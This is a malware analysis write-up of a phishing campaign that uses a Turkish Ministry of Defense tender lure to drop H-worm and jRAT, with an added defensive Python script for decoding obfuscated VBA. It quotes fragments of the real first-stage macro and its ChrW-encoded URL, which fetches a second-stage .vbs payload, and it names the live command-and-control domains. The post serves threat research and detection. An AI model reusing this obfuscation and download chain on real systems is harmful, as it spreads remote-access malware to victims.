In the late evening of 08-01-2019, a phishing document related to the Ministry of Defense of Turkey was captured in the wild and caught my attention (md5: 0d3b1c3c4287fe12399dc29d88905e9c).
Further investigation led me to believe that a new malicious campaign aimed at spreading HWorm + jRat variants has been rising in recent days.
The phishing document (md5: 0d3b1c3c4287fe12399dc29d88905e9c) tries to attract the curiosity of potential victims through a file name that hints at tender details of the Turkish Ministry of Defense. One of the file names related to the threat in question is in fact
“RFQ-Ministry of Defence Turkey Tender details 2019.doc”.
This document is armed with obfuscated macro code designed to download and execute remote content from the URL decoded below.
The following is a frame of the first-stage malicious macro code:
If 9 = 8 Then
Dim zxswpcjjodbpcfibtpczpeavykqflynmws As String
zxswpcjjodbpcfibtpczpeavykqflynmws = "vmkNRssI"
Dim oinzxs As String
oinzxs = "ZgTrxfqw"
Dim umclwjgpdqfjkp As String
umclwjgpdqfjkp = "."
Application.Run zxswpcjjodbpcfibtpczpeavykqflynmws & umclwjgpdqfjkp & oinzxs
This first piece of code is designed to call the module named ‘vmkNRssI’, which is responsible for making an outgoing request in order to retrieve the second-stage payload.
The first-level CnC is encoded as the corresponding wide characters of the URL (shown here with a space between each character)
h t t p s : / / d j l e o m s . c o m / j e n q t g I y H B _ n e w a s o . v b s
The following is how they appeared originally:
ChrW(104.4) & ChrW(116.2) & ChrW(116.1) & ChrW(112.2) & ChrW(115.1) & ChrW(58.4) & ChrW(47.3) & ChrW(47.1) & ChrW(100.3) & ChrW(106.1) & ChrW(108.4) & ChrW(101.3) & ChrW(111.1) & ChrW(109.4) & ChrW(115.4) & ChrW(46.1) & ChrW(99.4) & ChrW(111.2) & ChrW(109.3) & ChrW(47.3) & ChrW(106.4) & ChrW(101.2) & ChrW(110.3) & ChrW(113.1) & ChrW(116.2) & ChrW(103.4) & ChrW(73.3) & ChrW(121.3) & ChrW(72.2) & ChrW(66.3) & ChrW(95.3) & ChrW(110.1) & ChrW(101.1) & ChrW(119.3) & ChrW(97.2) & ChrW(115.4) & ChrW(111.2) & ChrW(46.3) & ChrW(118.4) & ChrW(98.2) & ChrW(115.1)
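The macro frame and the ChrW chain quoted above lend themselves to a small static triage script. The one below is an added example, not code from the original post: it takes macro source text (for instance as extracted by olevba), decodes Chr/ChrW chains while honouring VBA's conversion of fractional arguments to Long (banker's rounding, the same rule Python's round() applies), and flags the two idioms seen in this sample: a branch guarded by a comparison of two numeric literals, and Application.Run invoked on a name assembled from variables. The sample input is constructed from the lines quoted on this page; the variable `u` holding the chain and the closing `End If` are assumptions added so the fragment parses.

```python
"""Static triage helper for obfuscated VBA macros like the one above.

Added example, not code from the original post. It operates on macro source
text (e.g. as extracted by olevba) and:
  * decodes Chr()/ChrW() chains, applying VBA's conversion of a fractional
    argument to Long (round half to even, which Python's round() also uses);
  * flags branches guarded by a comparison of two numeric literals, which
    are decided at compile time and serve only to confuse analysis;
  * flags Application.Run calls whose target is assembled from variables.
"""
import re

# Constructed sample: the macro frame quoted in the post plus the quoted ChrW
# chain, assigned to a hypothetical variable "u" so that it parses as VBA.
SAMPLE_MACRO = """
If 9 = 8 Then
Dim zxswpcjjodbpcfibtpczpeavykqflynmws As String
zxswpcjjodbpcfibtpczpeavykqflynmws = "vmkNRssI"
Dim oinzxs As String
oinzxs = "ZgTrxfqw"
Dim umclwjgpdqfjkp As String
umclwjgpdqfjkp = "."
Application.Run zxswpcjjodbpcfibtpczpeavykqflynmws & umclwjgpdqfjkp & oinzxs
End If
u = ChrW(104.4) & ChrW(116.2) & ChrW(116.1) & ChrW(112.2) & ChrW(115.1) & ChrW(58.4) & ChrW(47.3) & ChrW(47.1) & ChrW(100.3) & ChrW(106.1) & ChrW(108.4) & ChrW(101.3) & ChrW(111.1) & ChrW(109.4) & ChrW(115.4) & ChrW(46.1) & ChrW(99.4) & ChrW(111.2) & ChrW(109.3) & ChrW(47.3) & ChrW(106.4) & ChrW(101.2) & ChrW(110.3) & ChrW(113.1) & ChrW(116.2) & ChrW(103.4) & ChrW(73.3) & ChrW(121.3) & ChrW(72.2) & ChrW(66.3) & ChrW(95.3) & ChrW(110.1) & ChrW(101.1) & ChrW(119.3) & ChrW(97.2) & ChrW(115.4) & ChrW(111.2) & ChrW(46.3) & ChrW(118.4) & ChrW(98.2) & ChrW(115.1)
"""

# A single Chr/ChrW call and its numeric argument.
CHR_CALL = re.compile(r"ChrW?\(\s*(\d+(?:\.\d+)?)\s*\)", re.IGNORECASE)
# One or more Chr/ChrW calls joined by "&": a candidate string-building chain.
CHR_CHAIN = re.compile(r"(?:ChrW?\(\s*\d+(?:\.\d+)?\s*\)\s*(?:&\s*)?)+", re.IGNORECASE)
# "If <number> = <number> Then" at the start of a line.
CONST_IF = re.compile(r"^\s*If\s+(\d+)\s*=\s*(\d+)\s+Then\b", re.IGNORECASE | re.MULTILINE)
# Everything after "Application.Run" on the same line.
APP_RUN = re.compile(r"Application\.Run\s+([^\r\n]+)", re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"']+")
MIN_CHAIN = 4  # shorter chains are common in benign macros; ignore them


def vba_clng(value: float) -> int:
    """VBA's CLng on a Double: round half to even, as Python's round() does."""
    return int(round(value))


def decode_chr_chain(expr: str) -> str:
    """Decode every Chr/ChrW call in the expression into one string."""
    return "".join(chr(vba_clng(float(n))) for n in CHR_CALL.findall(expr))


def defang(url: str) -> str:
    """Make a recovered URL safe to paste into a report."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def triage(vba: str) -> dict:
    """Return the indicators found in a macro's source text."""
    decoded = [
        decode_chr_chain(m.group(0))
        for m in CHR_CHAIN.finditer(vba)
        if len(CHR_CALL.findall(m.group(0))) >= MIN_CHAIN
    ]
    return {
        # (left literal, right literal, value the condition always has)
        "constant_conditions": [(a, b, int(a) == int(b)) for a, b in CONST_IF.findall(vba)],
        "dynamic_run": [arg.strip() for arg in APP_RUN.findall(vba) if "&" in arg],
        "decoded_strings": decoded,
        "urls": [u for s in decoded for u in URL.findall(s)],
    }


if __name__ == "__main__":
    report = triage(SAMPLE_MACRO)
    for a, b, result in report["constant_conditions"]:
        print("constant condition 'If %s = %s' is always %s" % (a, b, result))
    for arg in report["dynamic_run"]:
        print("Application.Run on an assembled name:", arg)
    for url in report["urls"]:
        print("recovered URL:", defang(url))
```

Run against the sample it recovers the same URL shown above (printed defanged as hxxps://djleoms[.]com/...), reports the `If 9 = 8` guard as always False, and lists the concatenated Application.Run target. The minimum chain length of four keeps a lone `Chr(13)` line break out of the report.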
Once the download has completed, a new file named beo.vbs is created under %temp% and then launched.
The content of the beo.vbs file was previously retrieved from djleoms.com.
A second-stage operation is then performed by this script, a screenshot of which is shown below:
This second-stage code includes two different malicious payloads. The first one is contained in the variable “longText1” and the second in the variable “longText”. According to the operating logic observed, this code was designed to carry out the execution of two different malicious components, represented in the following graphic:
The base64-encoded content of longText1 is first decoded and then written under %appdata% as UwwogLCzsN.vbs. This piece of code is nothing more than an H-worm VBS variant.
The payload is simply a VBS file with a cleartext config section pointing to pm2bitcoin.com and goz.unknowncypter.com.
Upon successful compromise, it sends various pieces of sensitive information to the CnC servers reported above. Persistence is achieved through registry keys:
After acquiring and sending frames of information about the victim machine, it enters an infinite loop waiting for further commands to execute:
The dropped jRAT variant is a heavily obfuscated jar executable [md5: CDEE1E867980580A55BC34BC240FB12B]. jRAT is a Java-developed cross-platform remote access tool that makes use of obfuscation and encryption (RSA+AES) in order to make static analysis and detection more complex.
It is able to perform many malicious activities and drop further malicious components, through which it executes and launches commands in order to perform system reconnaissance and data exfiltration. Extracting the jar file, I am able to see the common files related to Adwind/jRat samples:
The interesting thing here is the serialized object within sky.drive. Nothing more to do here, but we can clearly see, as expected, some references to an RSA key, confirming the presence of encrypted content.
If we look at META-INF/MANIFEST.MF we can get a reference to the main class, which is, as expected, operational.JRat.
After decompiling it, we get the following main method:
Not much time to spend here, as the core logic is the same as in older jRat samples. Following that logic, what it basically does is retrieve a first key from sky.drive, use that key to decrypt the AES key in drop.box, and finally use this AES key to decrypt the content of mega.download, which is the configuration file containing the RAT server path and the RSA and AES keys.
Simple enough to guess, writing a decryptor that chains these basic operations is not too hard. Luckily for all of us, someone has already thought of this: https://github.com/mhelwig/adwind-decryptor.
In this specific case, the following are the first group of configuration parameters retrieved from the sample:
Using these parameters, it is quite simple to recover the main RAT server archive.
The file config.json is the main configuration file serving RAT operations. File Key1.json is a serialized KeyRep object and Key2.json is the AES key. Applying the same principles as before, we can decrypt config.json and get the following:
In the NICKNAME entry, the string “NEW YEAR 2019” came out, suggesting the recent birth of the campaign in question.
It achieves persistence by adding the REG_KEY
and is able to perform reconnaissance and malicious actions (like a search for installed security products) via WMI. It drops and executes different .vbs files under %TEMP% and fills them through the following function:
The RAT is highly efficient and configurable through the use of JSON files, and it has the possibility of extending its functions by downloading further specific modules. The main server module makes use of encrypted strings resolved at runtime through functions like the following:
Do we light it?
Considering the domain creation date and the history of djleoms.com, maybe this is a website accidentally serving this cyber operation, or maybe it has been under the control of the threat actor for a very long time. According to a Wayback Machine search, this website has been showing nearly the same content for the last few years.
The following is a statistical image about it:
Anyway, at the time of analysis, it is still serving this malicious campaign.
The following are the countries where I can observe activity of jRAT samples with a high similarity rate:
Pivoting further through research on jRAT samples spreading these days with a slightly smaller similarity rate, the map extends to other countries:
jRat + Houdini is not a new combo to write about. A more or less similar campaign was observed in mid-2018. Likely, in this case, the threat actor is from the Middle East. Someone told me that the name of the phishing document is rather strange.
Indicators of compromise